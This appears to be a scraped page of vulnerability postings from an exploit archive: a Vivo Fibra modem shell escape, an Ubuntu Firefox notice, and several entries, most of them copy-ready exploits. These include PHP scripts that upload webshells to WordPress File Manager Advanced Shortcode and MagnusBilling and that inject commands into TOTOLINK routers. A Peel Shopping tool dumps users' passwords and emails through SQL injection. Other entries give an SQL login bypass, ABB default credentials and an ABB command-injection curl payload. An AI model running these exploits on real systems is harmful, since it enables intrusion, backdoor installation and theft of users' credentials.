The Vivo Fibra Askey RTF8225VW modem suffers from an input validation vulnerability that allows for full escalation to a functioning shell once logged in and using the restricted aspsh shell.

    ---# Exploit 1## Documentation on the Vivo Fibra Modem ExploitI discovered an exploit that allows access to the `sh` shell on the Vivo Fibra modem. This method essentially involves terminating the `aspsh` shell and invoking `sh` using the output of `cat /dev/null`. Using the pipe (`|`) is crucial for this exploit, it is the base of the exploit.## Known Affected Devices- **Model**: Askey RTF8225VW    - **Software Version**: BR_SG_g1.13_RTF_TEF004_V2.35    - **Revision**: REV3    - **CLI Version**: Reduced_CLI_HGU_v26 (Vivo Fibra firmware)    - **System Info**: Linux (none) 4.4.115  ## The ExploitTo begin, access the modem by connecting to `support@{modem's IP}` via SSH. It does not matter if the connection is local or public, as SSH port (22) is open to the internet. The `support` user has privileged access, but the password is the same as the admin password.You will need to enter the password, which is typically an 8-digit mix of letters and numbers. Once logged in, you will be greeted with `aspsh`, a very limited shell designed for technical services. Its purpose is to prevent you from using `sh` or `bash` for security reasons.The critical part begins here: the only Unix-like programs you can execute are `ls`, `top`, `cat`, and `free`. There are other programs available in `aspsh`, but they are not useful for this exploit.## How to Execute the ExploitIn `aspsh`, enter the following command:```aspshcat /dev/null | ps | grep aspsh```This command helps you discover the process ID of `aspsh -k`. The `cat /dev/null` command returns nothing, allowing you to execute `ps` and `grep aspsh`. The output should look something like this:```2298 support  13612 S    aspsh -k27492 support  13608 S    -aspsh31961 support   3308 S    sh -c cat /dev/null | ps | grep aspsh31964 support   3312 S    grep aspsh```Once you have identified the process ID, you can terminate the `aspsh` loop that restricts your access.Next, run the command:```aspshcat /dev/null | kill 2298 && sh```In this command, `cat /dev/null` still returns nothing, allowing you to use its output to kill the `aspsh -k` process. The `&& sh` part then invokes `sh` in its place.And that's it! You now have access to `sh`, providing you with unlimited possibilities for manipulating your modem.## Why This Exploit Is DangerousIf someone with malicious intent exploits this vulnerability, they could use tools like Wireshark or similar applications to monitor network activity. They could also execute destructive commands like `rm -rf /`, effectively destroying the system and rendering the hardware essentially unusable, with no option to reset it.---

Vivo Fibra Askey RTF8225VW Command Execution

Ubuntu Security Notice 7065-1 - Damien Schaeffer discovered that Firefox did not properly manage memory in the content process when handling Animation timelines, leading to a use after free vulnerability. An attacker could possibly use this issue to achieve remote code execution.

    ==========================================================================Ubuntu Security Notice USN-7065-1October 14, 2024firefox vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Firefox could be made to run programs as your login if it opened amalicious website.Software Description:- firefox: Mozilla Open Source web browserDetails:Damien Schaeffer discovered that Firefox did not properly manage memory inthe content process when handling Animation timelines, leading to a useafter free vulnerability. An attacker could possibly use this issue toachieve remote code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  firefox                         131.0.2+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-7065-1  CVE-2024-9680Package Information:  https://launchpad.net/ubuntu/+source/firefox/131.0.2+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-7065-1

WordPress File Manager Advanced Shortcode plugin version 2.3.2 suffers from a code injection vulnerability that allows for remote shell upload.

    =============================================================================================================================================| # Title     : WordPress File Manager Advanced Shortcode 2.3.2 Code Injection Vulnerability                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/                                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 106 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass MetasploitModule {    private $targetUri;    private $webshellName;    private $wpData;    private $uploadPath;    private $postParam;    private $getParam;    public function __construct($targetUri, $webshell = null, $command = 'passthru') {        $this->targetUri = $targetUri;        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();        $this->postParam = $this->generateRandomString();        $this->getParam = $this->generateRandomString();    }    private function generateRandomWebshellName() {        return bin2hex(random_bytes(rand(8, 16))) . '.php';    }    private function generateRandomString($length = 8) {        return bin2hex(random_bytes($length));    }    private function getFormData($pngWebshell) {        // Construct multipart form data        $boundary = md5(time());        $formData = "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"_fmakey\"\r\n\r\n{$this->wpData['fmakey']}\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"path\"\r\n\r\n{$this->uploadPath}\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"upload[]\"; filename=\"{$this->webshellName}\"\r\n";        $formData .= "Content-Type: image/png, text/x-php\r\n\r\n" . $pngWebshell . "\r\n";        $formData .= "--$boundary--\r\n";        return ['data' => $formData, 'boundary' => $boundary];    }    private function uploadWebshell($pngWebshell) {        $formData = $this->getFormData($pngWebshell);        $response = $this->sendRequest('POST', "/wp-admin/admin-ajax.php", $formData['data'], [            "Content-Type: multipart/form-data; boundary={$formData['boundary']}"        ]);        // Handle response and check for upload success        $responseData = json_decode($response, true);        if (isset($responseData['added'][0]['name']) && $responseData['added'][0]['name'] == $this->webshellName) {            return true;        }                return false;    }    private function injectPhpPayloadPng($payload) {        // Here you should inject PHP code into a PNG file        // This is just a placeholder for the actual implementation        return $payload; // Placeholder for the injected PNG    }    private function executeCommand($cmd) {        $payload = base64_encode($cmd);        $this->sendRequest('POST', "/{$this->wpData['baseurl']}/{$this->uploadPath}/{$this->webshellName}", [            $this->getParam => 'passthru', // replace with the command function            $this->postParam => $payload        ]);    }    private function sendRequest($method, $uri, $data, $headers = []) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->targetUri . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        if ($method == 'POST') {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function exploit() {        // Check for vulnerabilities and upload webshell logic        $payload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $pngWebshell = $this->injectPhpPayloadPng($payload);        if ($this->uploadWebshell($pngWebshell)) {            $this->executeCommand('whoami'); // Replace 'whoami' with your desired command        } else {            echo "Failed to upload webshell.";        }    }}// Usage example$exploit = new MetasploitModule('http://target-uri.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

WordPress File Manager Advanced Shortcode 2.3.2 Code Injectin / Shell Upload

TOTOLINK version 9.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : TOTOLINK 9.x Code Injection Vulnerability                                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.totolink.net/                                                                                                   |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 71 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class TotolinkExploit {  
    private $targetUri;  
    private $sleepTime;

    public function __construct($targetUri, $sleepTime = 3) {  
        $this->targetUri = $targetUri;  
        $this->sleepTime = $sleepTime;  
    }

    // Function to send POST request and execute the command on the target  
    public function executeCommand($cmd) {  
        $num = rand(1, 500);  
        $url = $this->targetUri . '/cgi-bin/cstecgi.cgi';  
        $data = json_encode([  
            "command" => "127.0.0.1; {$cmd};#",  
            "num" => $num,  
            "topicurl" => "setTracerouteCfg"  
        ]);

        // Send POST request  
        return $this->sendPostRequest($url, $data);  
    }

    // Check if the target is vulnerable  
    public function check() {  
        echo "Checking if the target can be exploited.\n";

        // Test using echo command to see if it's vulnerable  
        $response = $this->executeCommand("echo test");  
        if (!$response || strpos($response, 'success') === false) {  
            return "Target is likely not vulnerable.\n";  
        }

        // Test command injection using sleep  
        echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";  
        $start = microtime(true);  
        $this->executeCommand("sleep {$this->sleepTime}");  
        $elapsedTime = microtime(true) - $start;

        echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";  
        if ($elapsedTime >= $this->sleepTime) {  
            return "Target is vulnerable: Blind command injection successful.\n";  
        }

        return "Command injection test failed.\n";  
    }

    // Exploit the vulnerability to run the payload  
    public function exploit($payload) {  
        echo "Executing payload on the target.\n";  
        $this->executeCommand($payload);  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => $postFields  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Example of usage  
$targetUri = 'http://target-ip'; // Replace with actual target URL  
$exploit = new TotolinkExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

TOTOLINK 9.x Command Injection

MagnusBilling version 7.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 7.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

MagnusBilling 7.x Command Injection

Bookstore Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Bookstore Management System v1.0 SQL injection Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_bms-zip.zip                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ' or 0=0 ##[+] hLOgin : http://127.0.0.1/BMS/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Bookstore Management System 1.0 SQL Injection

Peel Shopping versions 2.x and below 3.1 suffer from cross site scripting and remote SQL injection vulnerabilities. This was already noted discovery in 2012 by Cyber-Crystal but this data provides more details.

    # Exploit Title: Peel Shopping "catid=" SQL injection# Google Dork: inurl:/lire/index.php?rubid=# Date: 2024-10-02# Exploit Author: Emiliano Febbi# Vendor Homepage: https://www.peel-shopping.com/# Software Link: https://github.com/advisto/peel-shopping# Version: 2.x < 3.1# Tested on: Windows 10##                                   USAGE:                                            ##                                                                                ##                                     1                                               ####If you want test this query: produit_details.php?id=1000&catid=100 you need db name. ####                                     2                                               ####If you want test this single parameter index.php?catid= leave the field with default.####                                     3                                               ####If you want test this parameter index.php?rubid= don't you need db name. (#Expl-3)   ####                                  Details:                                           ####You can also test the search module affected by XSS.                                 ####If you see many iframes are the switch of the tables or parameters;carefully use the ## ##characters '/' in the full path and '-' before the numericals vars.                  ###########################################################################################                                                                                   #########################################################################################*****************************************************************************************[code] Multiple Vulnerabilities exploit [tested]<?phpecho '<html><head><title>Peel Shopping 2.x < 3.1 "catid=" SQL injection</title></head><body><body bgcolor="black"><font color="white"><center><pre>##################################Peel Shopping 2.x < 3.1 Exploit##vuln finder!                   ##Code by Emiliano Febbi - 2024  ##################################( first get db name and later run exploit )</pre><h2>#Expl-1</h2>1 [#Query interested] -> produit_details.php?id=1000&catid=100 AND index.php?catid=<br><br><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">#Get Database Name:<font color="red"><br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font><br><input type="text" name="victim_site"><input type="submit" value="Get!"></form><br><font color="yellow">###########################################################</font><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">[#insert victim site]:<font color="red"><br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font> or<br><font color="lime">(*http://www.site.fr/index.php?catid=-1)</font><- DB_Name default<br><input type="text" name="victim_sitee"><br>[#insert database name]:<br><input type="text" name="victim_db" value="default"><input type="submit" value="LOAD"></form><br><font color="yellow">###########################################################</font><br><h2>#Expl-2</h2><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">#XSS Test[search_module]:<font color="red"><br>(*Format: http://www.site.fr/)</font><br><input type="text" name="site_XSS" value="http://www.site.fr/"><input type="submit" value="test!"></form><br><font color="yellow">###########################################################</font><br></font></body></center></html>';if($_POST['victim_site']) {$site = $_POST['victim_site'];print "<center><font color='red'>#DB_Name:</font>(try-1)<br>";$gettt=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--");     $tags=explode('<td class="petit">',$gettt);                    $tags=explode("</td>",$tags[1]);    $cleaning = array("performance_schema","information_schema",           "Accueil",              "Vous",               "ici",               "tes",    );            $ok = "";    $filtred = str_replace($cleaning, $ok, $tags[0]);     var_dump(strip_tags($filtred));          print "</center><br><br>";          print "<center><font color='red'>#DB_Name:</font>(try-2)<br>";$gettts=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--");     $tagss=explode('information_schema<br>',$gettts);                      $tagss=explode('" href=',$tagss[1]);          $filtreds = str_replace($cleaning, $ok, $tagss[0]);                      var_dump(strip_tags($filtreds));                                                     };;/*#exploit*/if($_POST['victim_sitee'] and $_POST['victim_db']) {$sitee = $_POST['victim_sitee']; $hack_db = $_POST['victim_db'];?><center><font color='lime'>1- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> id=&catid=<br><iframe src='<? echo "$sitee"; ?>%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(<? echo "$hack_db"; ?>.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--' title='exploit' height='100' width='500'></iframe><br><font color="yellow">###########################################################</font><br><font color='lime'>2- #ALL @E-Mail and Users: ~table -><font color='white'>utilisateurs</font></font>-> id=&catid=<br><iframe src='<? echo "$sitee"; ?>%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(<? echo "$hack_db"; ?>.utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--' title='exploit' height='100' width='500'></iframe><br><font color='lime'>3- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> catid=<br><iframe src='<? echo "$sitee"; ?>+union+all+select+1,mot_passe,3,4+FROM+peel_utilisateurs--' title='exploit' height='100' width='500'></iframe></center><?print "<center><font color='red'>[emails cracked]+md5:</font><br>";$textt=file_get_contents("$sitee+%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM($hack_db.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--");$ress = preg_match_all("/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",$textt,$matchess);if ($ress) {foreach(array_unique($matchess[0]) as $emails) {echo $emails . "<br />";}}else {echo "No emails found.";}};;;/*#exploit*/echo '<center><h2>#Expl-3</h2><br><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">independent -> #try again to hack!:</font><font color="red"><br>(*Format: http://www.site.fr)</font><br><input type="text" name="hack2" value="http://www.site.fr"><br><input type="submit" value="LOAD"></center><br>';if($_POST['hack2']) {$hackk = $_POST['hack2'];echo '<center><br><font color="yellow">###########################################################</font><br>';           echo "2 [#Query interested] -> index.php?rubid=<br><font color='red'>#password1:</font>(try-1)<br>";?><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe,3+FROM+peel_utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password2:</font>(try-2)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe,3+FROM+utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password3:</font>(try-3)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe+FROM+peel_utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password4:</font>(try-4)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe+FROM+utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><?print "<font color='red'>[emails cracked]:</font><br>";$text=file_get_contents("$hackk/index.php?rubid=-1+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,email,3%20FROM%20peel_utilisateurs--");$res = preg_match_all("/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",$text,$matches);if ($res) {foreach(array_unique($matches[0]) as $email) {echo $email . "<br />";}}else {echo "No emails found.";}};;;;;/*#exploit*/if($_POST['site_XSS']) {$XSS = $_POST['site_XSS'];?><center><iframe src='<? echo "$XSS"; ?>recherche.php?start=0&motclef=<script>alert("XSS vulnerable!")</script>' title='exploit3' height='100' width='500'></iframe></center><br><?};;;;?>[/code]

Peel Shopping 2.x Cross Site Scripting / SQL Injection

ABB Cylon Aspect version 3.07.02 uses a weak set of default administrative credentials that can be guessed in remote password attacks and used to gain full control of the system.

  
ABB Cylon Aspect 3.07.02 (user.properties) Default Credentials

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.07.02

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller uses a weak set of default administrative  
credentials that can be guessed in remote password attacks and gain full  
control of the system.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5840  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5840.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ cat /home/MIX_CMIX/htmlroot/user.properties  
#Users  
#Mon Mar 20 13:30 EDT 2016  
guest=6775657374  
aamuser=64656661756c74

Using Utils::Hex2String in AuthSession.php:

guest:guest  
aamuser:default

ABB Cylon Aspect 3.07.02 user.properties Default Credentials

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the MODEM HTTP POST parameter called by the dialupSwitch.php script.

  
ABB Cylon Aspect 3.08.00 (dialupSwitch.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'MODEM' HTTP POST parameter called by the dialupSwitch.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5839  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5839.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl -X POST "http://192.168.73.31/dialupSwitch.php" \  
> -H "Cookie: PHPSESSID=xxx" \  
> -H "Content-Type: application/x-www-form-urlencoded" \   
> -d "MODEM=;echo '<?php phpinfo(); ?>'>j.php"\  
> &Submit=Save"

